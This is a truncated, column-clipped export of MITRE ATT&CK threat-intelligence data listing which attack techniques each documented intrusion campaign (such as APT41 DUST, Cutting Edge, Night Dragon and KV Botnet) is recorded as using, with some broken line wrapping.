C0040 APT41 DUScampaign- campaign uses T1036.004Masquerade attack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1596.005Scan Databattack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1593.002Search Engattack-pat technique [APT41 DUST
C0040 APT41 DUScampaign- campaign uses T1594 Search Vic attack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1583.007Serverless attack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1569.002Service Ex attack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1071.001Web Protocattack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1102 Web Servicattack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1505.003Web Shell attack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1543.003Windows Se attack-pat technique [APT41 DUS
C0010 C0010 campaign- campaign uses T1583.001Domains attack-pat technique For [C0010]
C0010 C0010 campaign- campaign uses T1584.001Domains attack-pat technique During [C0
C0010 C0010 campaign- campaign uses T1189 Drive-by C attack-pat technique During [C00
C0010 C0010 campaign- campaign uses T1608.004Drive-by T attack-pat technique For [C0010]
C0010 C0010 campaign- campaign uses T1105 Ingress Tooattack-pat technique During [C0
C0010 C0010 campaign- campaign uses T1587.001Malware attack-pat technique For [C0010
C0010 C0010 campaign- campaign uses T1588.002Tool attack-pat technique For [C0010
C0010 C0010 campaign- campaign uses T1608.001Upload Maattack-pat technique For [C0010
C0010 C0010 campaign- campaign uses T1608.002Upload Tooattack-pat technique For [C0010
C0011 C0011 campaign--campaign uses T1587.003Digital Certattack-pat technique For [C0011]
C0011 C0011 campaign--campaign uses T1583.001Domains attack-pat technique For [C0011]
C0011 C0011 campaign--campaign uses T1204.002Malicious Fattack-pat technique During [C00
C0011 C0011 campaign--campaign uses T1204.001Malicious Lattack-pat technique During [C00
C0011 C0011 campaign--campaign uses T1566.001Spearphishattack-pat technique During [C00
C0011 C0011 campaign--campaign uses T1566.002Spearphishattack-pat technique During [C00
C0011 C0011 campaign--campaign uses T1608.001Upload Maattack-pat technique For [C0011]
C0011 C0011 campaign--campaign uses T1059.005Visual Basiattack-pat technique For [C0011]
C0015 C0015 campaign- campaign uses T1553.002Code Signi attack-pat technique For [C0015]
C0015 C0015 campaign- campaign uses T1486 Data Encryattack-pat technique During [C0
C0015 C0015 campaign- campaign uses T1030 Data Transfattack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1005 Data from attack-pat technique During [C0
C0015 C0015 campaign- campaign uses T1039 Data from attack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1069.002Domain Grattack-pat technique During [C0
C0015 C0015 campaign- campaign uses T1482 Domain Truattack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1055.001Dynamic-linattack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1567.002Exfiltratio attack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1083 File and Di attack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1105 Ingress Tooattack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1059.007JavaScript attack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1570 Lateral Tooattack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1074.001Local Data attack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1069.001Local Grouattack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1204.002Malicious Fattack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1588.001Malware attack-pat technique For [C0015]
C0015 C0015 campaign- campaign uses T1036 Masqueradattack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1218.005Mshta attack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1135 Network Shattack-pat technique During [C0
C0015 C0015 campaign- campaign uses T1027 Obfuscatedattack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1057 Process Di attack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1218.010Regsvr32 attack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1219 Remote Accattack-pat technique During [C0
C0015 C0015 campaign- campaign uses T1021.001Remote Des attack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1018 Remote Sysattack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1218.011Rundll32 attack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1566.001Spearphishattack-pat technique For [C0015]
C0015 C0015 campaign- campaign uses T1016 System Netattack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1124 System Timattack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1588.002Tool attack-pat technique For [C0015]
C0015 C0015 campaign- campaign uses T1059.005Visual Basiattack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1059.003Windows Cattack-pat technique During [C00
C0015 C0015 campaign- campaign uses T1047 Windows M attack-pat technique During [C00
C0017 C0017 campaign- campaign uses T1134 Access Tokattack-pat technique During [C0
C0017 C0017 campaign- campaign uses T1560.003Archive vi attack-pat technique During [C00
C0017 C0017 campaign- campaign uses T1005 Data from attack-pat technique During [C00
C0017 C0017 campaign- campaign uses T1102.001Dead Dropattack-pat technique During [C0
C0017 C0017 campaign- campaign uses T1140 Deobfuscatattack-pat technique During [C0
C0017 C0017 campaign- campaign uses T1041 Exfiltratio attack-pat technique During [C00
C0017 C0017 campaign- campaign uses T1048.003Exfiltrati attack-pat technique During [C0
C0017 C0017 campaign- campaign uses T1567 Exfiltratio attack-pat technique During [C00
C0017 C0017 campaign- campaign uses T1190 Exploit Pubattack-pat technique During [C0017](https://attack
C0017 C0017 campaign- campaign uses T1574 Hijack Exe attack-pat technique During [C00
C0017 C0017 campaign- campaign uses T1105 Ingress Tooattack-pat technique During [C0
During [C0017](https://attack
C0017 C0017 campaign- campaign uses T1059.007JavaScript attack-pat technique
C0017 C0017 campaign- campaign uses T1074.001Local Data attack-pat technique During [C00
C0017 C0017 campaign- campaign uses T1036.004Masquerade attack-pat technique During [C0
C0017 C0017 campaign- campaign uses T1036.005Match Legiattack-pat technique During [C0
C0017 C0017 campaign- campaign uses T1027 Obfuscatedattack-pat technique During [C00
C0017 C0017 campaign- campaign uses T1001.003Protocol o attack-pat technique During [C0
C0017 C0017 campaign- campaign uses T1090 Proxy attack-pat technique During [C00
C0017 C0017 campaign- campaign uses T1053.005Scheduled attack-pat technique During [C0
C0017 C0017 campaign- campaign uses T1003.002Security A attack-pat technique During [C0
C0017 C0017 campaign- campaign uses T1027.002Software Pattack-pat technique During
During [C0
[C0017](https://attack
C0017 C0017 campaign- campaign uses T1082 System Inf attack-pat technique
C0017 C0017 campaign- campaign uses T1016 System Netattack-pat technique During [C0
C0017 C0017 campaign- campaign uses T1033 System Own attack-pat technique During [C0
C0017 C0017 campaign- campaign uses T1588.002Tool attack-pat technique During
For [C0017]
[C0017](https://attack
C0017 C0017 campaign- campaign uses T1071.001Web Protocattack-pat technique
C0017 C0017 campaign- campaign uses T1102 Web Servicattack-pat technique During [C0
C0017 C0017 campaign- campaign uses T1505.003Web Shell attack-pat technique During [C00
C0017 C0017 campaign- campaign uses T1059.003Windows Cattack-pat technique During [C0
C0018 C0018 campaign- campaign uses T1027.010Command aOttack-pat technique During [C00
C0018 C0018 campaign- campaign uses T1486 Data Encryattack-pat technique During [C0
C0018 C0018 campaign- campaign uses T1190 Exploit Pubattack-pat technique During [C0
C0018 C0018 campaign- campaign uses T1105 Ingress Tooattack-pat technique During [C00
C0018 C0018 campaign- campaign uses T1570 Lateral Tooattack-pat technique During [C00
C0018 C0018 campaign- campaign uses T1036 Masqueradattack-pat technique During [C00
C0018 C0018 campaign- campaign uses T1036.005Match Legiattack-pat technique For [C0018]
C0018 C0018 campaign- campaign uses T1046 Network Seattack-pat technique During [C00
C0018 C0018 campaign- campaign uses T1571 Non-Standaattack-pat technique During [C00
C0018 C0018 campaign- campaign uses T1059.001PowerShellattack-pat technique During [C00
C0018 C0018 campaign- campaign uses T1219 Remote Accattack-pat technique During [C00
C0018 C0018 campaign- campaign uses T1021.001Remote Des attack-pat technique During [C00
C0018 C0018 campaign- campaign uses T1218.011Rundll32 attack-pat technique During [C00
C0018 C0018 campaign- campaign uses T1072 Software Dattack-pat technique During [C00
C0018 C0018 campaign- campaign uses T1016 System Netattack-pat technique During [C0
C0018 C0018 campaign- campaign uses T1033 System Own attack-pat technique During [C00
C0018 C0018 campaign- campaign uses T1588.002Tool attack-pat technique For [C0018]
C0018 C0018 campaign- campaign uses T1071.001Web Protocattack-pat technique During [C0
C0018 C0018 campaign- campaign uses T1047 Windows M attack-pat technique During [C00
C0021 C0021 campaign- campaign uses T1573.002Asymmetricattack-pat technique During [C00
C0021 C0021 campaign- campaign uses T1027.010Command aOttack-pat technique During [C0
C0021 C0021 campaign- campaign uses T1140 Deobfuscatattack-pat technique During [C00
C0021 C0021 campaign- campaign uses T1583.001Domains attack-pat technique For [C0021]
C0021 C0021 campaign- campaign uses T1584.001Domains attack-pat technique For [C0021]
C0021 C0021 campaign- campaign uses T1027.009Embeddedattack-pat technique For [C0021]
C0021 C0021 campaign- campaign uses T1105 Ingress Tooattack-pat technique During [C00
C0021 C0021 campaign- campaign uses T1204.001Malicious Lattack-pat technique During [C00
C0021 C0021 campaign- campaign uses T1095 Non-Applicattack-pat technique During [C0
C0021 C0021 campaign- campaign uses T1059.001PowerShellattack-pat technique During [C00
C0021 C0021 campaign- campaign uses T1218.011Rundll32 attack-pat technique During [C00
C0021 C0021 campaign- campaign uses T1566.002Spearphishattack-pat technique During [C00
C0021 C0021 campaign- campaign uses T1588.002Tool attack-pat technique For [C0021]
C0021 C0021 campaign- campaign uses T1608.001Upload Maattack-pat technique For [C0021]
C0021 C0021 campaign- campaign uses T1071.001Web Protocattack-pat technique During [C0
C0026 C0026 campaign--campaign uses T1560.001Archive viaattack-pat technique During [C00
C0026 C0026 campaign--campaign uses T1030 Data Transfattack-pat technique During [C00
C0026 C0026 campaign--campaign uses T1005 Data from attack-pat technique During [C0
C0026 C0026 campaign--campaign uses T1583.001Domains attack-pat technique For [C0026
C0026 C0026 campaign--campaign uses T1568 Dynamic Reattack-pat technique During [C0
C0026 C0026 campaign--campaign uses T1105 Ingress Tooattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1098.001Additional attack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1098.003Additional attack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1087.004Cloud Accoattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1078.004Cloud Accoattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1069.003Cloud Grouattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1021.007Cloud Servattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1578.002Create Clo attack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1589.001Credentialsattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1003.006DCSync attack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1530 Data from attack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1098.005Device Regiattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1087.003Email Accoattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1190 Exploit Pubattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1133 External R attack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1656 Impersonatattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1105 Ingress Tooattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1621 Multi-Fact attack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1046 Network Seattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1572 Protocol T attack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1090 Proxy attack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1219 Remote Accattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1213.002Sharepointattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1598.001Spearphishattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1598.004Spearphishattack-pat technique During [C00
C0027 C0027 campaign--campaign uses T1566.004Spearphishattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1588.002Tool attack-pat technique During [C00
C0027 C0027 campaign--campaign uses T1102 Web Servicattack-pat technique During [C0
C0027 C0027 campaign--campaign uses T1047 Windows M attack-pat technique During [C0
C0032 C0032 campaign--campaign uses T1133 External R attack-pat technique During the
C0032 C0032 campaign--campaign uses T1070.004File Deleti attack-pat technique During the
C0032 C0032 campaign--campaign uses T1546.012Image File attack-pat technique During the
C0032 C0032 campaign--campaign uses T1003.001LSASS Memattack-pat technique During the
C0032 C0032 campaign--campaign uses T1074.001Local Data attack-pat technique During the
C0032 C0032 campaign--campaign uses T1036.005Match Legiattack-pat technique During the
C0032 C0032 campaign--campaign uses T1571 Non-Standaattack-pat technique During the
C0032 C0032 campaign--campaign uses T1059.001PowerShellattack-pat technique During the
C0032 C0032 campaign--campaign uses T1572 Protocol T attack-pat technique During the
C0032 C0032 campaign--campaign uses T1021.001Remote Des attack-pat technique During the
C0032 C0032 campaign--campaign uses T1021.004SSH attack-pat technique During the
C0032 C0032 campaign--campaign uses T1053.005Scheduled attack-pat technique During the
C0032 C0032 campaign--campaign uses T1070.006Timestompattack-pat technique During the
C0032 C0032 campaign--campaign uses T1588.002Tool attack-pat technique During the
C0032 C0032 campaign--campaign uses T1078 Valid Acco attack-pat technique During the
C0032 C0032 campaign--campaign uses T1583.003Virtual Pri attack-pat technique During the
C0032 C0032 campaign--campaign uses T1505.003Web Shell attack-pat technique During the
C0004 CostaRictocampaign--campaign uses T1005 Data from attack-pat technique During [Co
C0004 CostaRictocampaign--campaign uses T1583.001Domains attack-pat technique For [Costa
C0004 CostaRictocampaign--campaign uses T1133 External R attack-pat technique During [Co
C0004 CostaRictocampaign--campaign uses T1105 Ingress Tooattack-pat technique During [Co
C0004 CostaRictocampaign--campaign uses T1587.001Malware attack-pat technique For [CostaR
C0004 CostaRictocampaign--campaign uses T1090.003Multi-hop attack-pat technique During [Cos
C0004 CostaRictocampaign--campaign uses T1046 Network Seattack-pat technique During [Co
C0004 CostaRictocampaign--campaign uses T1572 Protocol T attack-pat technique During [Cos
C0004 CostaRictocampaign--campaign uses T1053.005Scheduled attack-pat technique During [Cos
C0004 CostaRictocampaign--campaign uses T1588.002Tool attack-pat technique During [Cos
C0029 Cutting Ed campaign- campaign uses T1560.001Archive viaattack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1059 Command attack-pat
an technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1554 Compromise attack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1071.004DNS attack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1005 Data from attack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1562.001Disable or attack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1078.002Domain Acattack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1027.013Encrypted/attack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1190 Exploit Pubattack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1070.004File Deleti attack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1070 Indicator attack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1105 Ingress Tooattack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1056.001Keyloggingattack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1003.001LSASS Memattack-pat technique During
During [Cu
[Cutting Edge](https:/
C0029 Cutting Ed campaign- campaign uses T1003.003NTDS attack-pat technique ntds.dit.(Citation: Volexity Iva
C0029 Cutting Ed campaign- campaign uses T1584.008Network Deattack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1095 Non-Applicattack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1055 Process Injattack-pat technique During [Cu
C0029 Cutting Ed campaign- campaign uses T1572 Protocol T attack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1059.006Python attack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1021.001Remote Des attack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1021.002SMB/Windo attack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1021.004SSH attack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1594 Search Vic attack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1082 System Inf attack-pat technique During [Cu
C0029 Cutting Ed campaign- campaign uses T1070.006Timestompattack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1588.002Tool attack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1205 Traffic Signattack-pat technique During [Cu
C0029 Cutting Ed campaign- campaign uses T1595.002Vulnerabiliattack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1056.003Web Portalattack-pat technique During [Cut
C0029 Cutting Ed campaign- campaign uses T1505.003Web Shell attack-pat technique During [Cu
C0001 Frankenstecampaign- campaign uses T1119 Automatedattack-pat technique During [Fr
C0001 Frankenstecampaign- campaign uses T1020 Automatedattack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1027.010Command aOttack-pat technique During [Fr
C0001 Frankenstecampaign- campaign uses T1005 Data from attack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1140 Deobfuscatattack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1041 Exfiltratio attack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1203 Exploitatioattack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1105 Ingress Tooattack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1127.001MSBuild attack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1204.002Malicious Fattack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1036.004Masquerade attack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1059.001PowerShellattack-pat technique During [Fr
C0001 Frankenstecampaign- campaign uses T1057 Process Di attack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1053.005Scheduled attack-pat technique During [Fr
C0001 Frankenstecampaign- campaign uses T1518.001Security S attack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1566.001Spearphishattack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1573.001Symmetric attack-pat technique During [Fr
C0001 Frankenstecampaign- campaign uses T1497.001System Cheattack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1082 System Inf attack-pat technique During [Fr
C0001 Frankenstecampaign- campaign uses T1016 System Netattack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1033 System Own attack-pat technique During [Fr
C0001 Frankenstecampaign- campaign uses T1221 Template Iattack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1588.002Tool attack-pat technique For [Franke
C0001 Frankenstecampaign- campaign uses T1059.005Visual Basiattack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1071.001Web Protocattack-pat technique During [Fra
C0001 Frankenstecampaign- campaign uses T1059.003Windows Cattack-pat technique During [Fr
C0001 Frankenstecampaign- campaign uses T1047 Windows M attack-pat technique During [Fra
C0007 FunnyDre campaign- campaign uses T1560.001Archive viaattack-pat technique During [Fu
C0007 FunnyDre campaign- campaign uses T1583.001Domains attack-pat technique For [Funny
C0007 FunnyDre campaign- campaign uses T1585.002Email Accoattack-pat technique For [Funny
C0007 FunnyDre campaign- campaign uses T1105 Ingress Tooattack-pat technique During [Fu
C0007 FunnyDre campaign- campaign uses T1588.001Malware attack-pat technique For [Funny
C0007 FunnyDre campaign- campaign uses T1057 Process Di attack-pat technique During [Fu
C0007 FunnyDre campaign- campaign uses T1018 Remote Sysattack-pat technique During [Fu
C0007 FunnyDre campaign- campaign uses T1082 System Inf attack-pat technique During [Fu
C0007 FunnyDre campaign- campaign uses T1016 System Netattack-pat technique During [Fu
C0007 FunnyDre campaign- campaign uses T1049 System Netattack-pat technique During [Fu
C0007 FunnyDre campaign- campaign uses T1588.002Tool attack-pat technique For [Funny
C0007 FunnyDre campaign- campaign uses T1059.005Visual Basiattack-pat technique During [Fu
C0007 FunnyDre campaign- campaign uses T1059.003Windows Cattack-pat technique During [Fu
C0007 FunnyDre campaign- campaign uses T1047 Windows M attack-pat technique During
During [Fu
[HomeLand Justice](h
C0038 HomeLandcampaign-
J campaign uses T1098.002Additional attack-pat technique
C0038 HomeLandcampaign-
J campaign uses T1588.003Code Signinattack-pat technique During [Hom
C0038 HomeLandcampaign-
J campaign uses T1486 Data Encryattack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1078.001Default Ac attack-pat technique During [Hom
C0038 HomeLandcampaign-
J campaign uses T1562.002Disable Wiattack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1562.001Disable or attack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1561.002Disk Struc attack-pat technique During [Hom
C0038 HomeLandcampaign-
J campaign uses T1087.003Email Accoattack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1041 Exfiltratio attack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1190 Exploit Pubattack-pat technique For [HomeLa
C0038 HomeLandcampaign-
J campaign uses T1105 Ingress Tooattack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1003.001LSASS Memattack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1570 Lateral Tooattack-pat technique During [Hom
C0038 HomeLandcampaign-
J campaign uses T1036.005Match Legiattack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1046 Network Seattack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1059.001PowerShellattack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1021.001Remote Des attack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1114.002Remote Ema attack-pat technique During [Hom
C0038 HomeLandcampaign-
J campaign uses T1021.002SMB/Windo attack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1134.001Token Impeattack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1588.002Tool attack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1078 Valid Acco attack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1505.003Web Shell attack-pat technique For [HomeLa
C0038 HomeLandcampaign-
J campaign uses T1059.003Windows Cattack-pat technique During [Ho
C0038 HomeLandcampaign-
J campaign uses T1047 Windows M attack-pat technique During [Ho
C0035 KV Botnet A
campaign- campaign uses T1562.001Disable or attack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1573 Encrypted attack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1546 Event Trig attack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1070.004File Deleti attack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1083 File and Di attack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1105 Ingress Tooattack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1222.002Linux and M attack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1036.004Masquerade attack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1036 Masqueradattack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1584.008Network Deattack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1095 Non-Applicattack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1571 Non-Standaattack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1055.009Proc Memoattack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1057 Process Di attack-pat technique Scripts ass
C0035 KV Botnet A
campaign- campaign uses T1518.001Security S attack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1082 System Inf attack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1016 System Netattack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1059.004Unix Shell attack-pat technique [KV Botnet
C0035 KV Botnet A
campaign- campaign uses T1583.003Virtual Pri attack-pat technique [KV Botnet
C0002 Night Dragcampaign- campaign uses T1005 Data from attack-pat technique During [Nig
C0002 Night Dragcampaign- campaign uses T1562.001Disable or attack-pat technique During [Nig
C0002 Night Dragcampaign- campaign uses T1078.002Domain Acattack-pat technique During [Nig
C0002 Night Dragcampaign- campaign uses T1568 Dynamic Reattack-pat technique During [Nig
C0002 Night Dragcampaign- campaign uses T1027.013Encrypted/attack-pat technique During [Ni
C0002 Night Dragcampaign- campaign uses T1190 Exploit Pubattack-pat technique During [Nig
C0002 Night Dragcampaign- campaign uses T1133 External R attack-pat technique During [Ni
C0002 Night Dragcampaign- campaign uses T1008 Fallback C attack-pat technique During [Ni
C0002 Night Dragcampaign- campaign uses T1083 File and Di attack-pat technique During [Nig
C0002 Night Dragcampaign- campaign uses T1105 Ingress Tooattack-pat technique During [Nig
C0002 Night Dragcampaign- campaign uses T1114.001Local Emailattack-pat technique During [Nig
C0002 Night Dragcampaign- campaign uses T1204.001Malicious Lattack-pat technique During [Nig
C0002 Night Dragcampaign- campaign uses T1588.001Malware attack-pat technique During [Ni
C0002 Night Dragcampaign- campaign uses T1112 Modify Regattack-pat technique During [Nig
C0002 Night Dragcampaign- campaign uses T1550.002Pass the H attack-pat technique During [Nig
C0002 Night Dragcampaign- campaign uses T1110.002Password Cattack-pat technique During [Ni
C0002 Night Dragcampaign- campaign uses T1219 Remote Accattack-pat technique During [Nig
C0002 Night Dragcampaign- campaign uses T1074.002Remote Datattack-pat technique During [Ni
C0002 Night Dragcampaign- campaign uses T1003.002Security A attack-pat technique During [Ni
C0002 Night Dragcampaign- campaign uses T1583.004Server attack-pat technique During [Nig
C0002 Night Dragcampaign- campaign uses T1584.004Server attack-pat technique During [Ni
C0002 Night Dragcampaign- campaign uses T1027.002Software Pattack-pat technique During [Nig
C0002 Night Dragcampaign- campaign uses T1566.002Spearphishattack-pat technique During [Ni
C0002 Night Dragcampaign- campaign uses T1033 System Own attack-pat technique During [Ni
C0002 Night Dragcampaign- campaign uses T1588.002Tool attack-pat technique During [Ni
C0002 Night Dragcampaign- campaign uses T1608.001Upload Maattack-pat technique During [Ni
C0002 Night Dragcampaign- campaign uses T1078 Valid Acco attack-pat technique During [Ni
C0002 Night Dragcampaign- campaign uses T1071.001Web Protocattack-pat technique During [Nig
C0002 Night Dragcampaign- campaign uses T1059.003Windows Cattack-pat technique During [Nig
C0012 Operation campaign--campaign uses T1560.001Archive viaattack-pat technique During [Op
C0012 Operation campaign--campaign uses T1027.010Command aOttack-pat technique During [Op
C0012 Operation campaign--campaign uses T1574.002DLL Side-L attack-pat technique During [Op
C0012 Operation campaign--campaign uses T1005 Data from attack-pat technique During [Op
C0012 Operation campaign--campaign uses T1087.002Domain Acattack-pat technique During [Op
C0012 Operation campaign--campaign uses T1078.002Domain Acattack-pat technique During [Op
C0012 Operation campaign--campaign uses T1190 Exploit Pubattack-pat technique During [Ope
C0012 Operation campaign--campaign uses T1133 External R attack-pat technique During [Op
C0012 Operation campaign--campaign uses T1083 File and Di attack-pat technique During [Ope
C0012 Operation campaign--campaign uses T1027.011Fileless St attack-pat technique During [Op
C0012 Operation campaign--campaign uses T1547.006Kernel Modattack-pat technique During [Op
C0012 Operation campaign--campaign uses T1087.001Local Acco attack-pat technique During [Op
C0012 Operation campaign--campaign uses T1069.001Local Grouattack-pat technique During [Op
C0012 Operation campaign--campaign uses T1036.005Match Legiattack-pat technique During [Op
C0012 Operation campaign--campaign uses T1135 Network Shattack-pat technique During [Op
C0012 Operation campaign--campaign uses T1201 Password Pattack-pat technique During [Op
C0012 Operation campaign--campaign uses T1120 Peripheral attack-pat technique During [Op
C0012 Operation campaign--campaign uses T1057 Process Di attack-pat technique During [Op
C0012 Operation campaign--campaign uses T1018 Remote Sysattack-pat technique During [Op
C0012 Operation campaign--campaign uses T1053.005Scheduled attack-pat technique During [Op
C0012 Operation campaign--campaign uses T1003.002Security A attack-pat technique During [Op
C0012 Operation campaign--campaign uses T1082 System Inf attack-pat technique During [Op
C0012 Operation campaign--campaign uses T1016 System Netattack-pat technique During [Ope
C0012 Operation campaign--campaign uses T1049 System Netattack-pat technique During [Op
C0012 Operation campaign--campaign uses T1033 System Own attack-pat technique During [Op
C0012 Operation campaign--campaign uses T1007 System Serattack-pat technique During [Op
C0012 Operation campaign--campaign uses T1124 System Timattack-pat technique During [Op
C0012 Operation campaign--campaign uses T1588.002Tool attack-pat technique For [Opera
C0012 Operation campaign--campaign uses T1059.005Visual Basiattack-pat technique During [Op
C0012 Operation campaign--campaign uses T1071.001Web Protocattack-pat technique During [Op
C0012 Operation campaign--campaign uses T1505.003Web Shell attack-pat technique During [Op
C0012 Operation campaign--campaign uses T1059.003Windows Cattack-pat technique During [Op
C0012 Operation campaign--campaign uses T1543.003Windows Se attack-pat technique During [Op
C0022 Operation campaign- campaign uses T1560.001Archive viaattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1110 Brute Forc attack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1553.002Code Signi attack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1587.002Code Signinattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1588.003Code Signinattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1005 Data from attack-pat technique During [Ope
